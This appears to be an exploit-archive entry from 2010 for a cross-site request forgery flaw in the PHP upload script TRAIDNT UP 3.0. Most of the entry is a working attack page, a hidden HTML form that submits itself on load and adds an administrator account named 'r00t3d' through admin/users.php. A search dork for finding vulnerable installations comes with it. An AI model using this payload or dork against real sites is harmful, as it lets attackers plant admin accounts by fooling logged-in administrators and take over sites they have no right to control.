[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Traidnt Up 3.0 CSRF Vulnerability
# Published : 2010-12-25
# Author : P0C T34M
# Previous Title : CubeCart <= 3.0.4 SQL Injection Vulnerability
# Next Title : Joomla Component com_adsmanager Remote File Inclusion Vulnerability
#Title : TRAIDNT UP Version 3.0 - CSRF Add Admin
#Script : TRAIDNT UP Version 3.0
#Language : Php
#Download : http://www.traidnt.net
# http://www.traidnt.net/vb/attachment.php?attachmentid=519880&d=1285278011
#Date : 2010/12/25
#Version : 3.0
#Dork : "Powered by TRAIDNT UP Version 3.0 "
#Found : by P0C T34M >> tnt-r00t
#Homepage : www.p0c.cc
<html>
<form name="p0c" action="http://127.0.0.1/up/admin/users.php?do=addnew" method="post">
<input type="hidden" name="name" value="r00t3d"/>
<input type="hidden" name="password" value="Password"/>
<input type="hidden" name="email" value="myemail@hotmail.com"/>
<input type="hidden" name="birthdate" value="1987"/>
<input type="hidden" name="country" value="SA"/>
<input type="hidden" name="group" value="1"/>
</form>
<script>document.p0c.submit();</script>
</html>
TRAIDNT UP Version 3.0 - CSRF Add Admin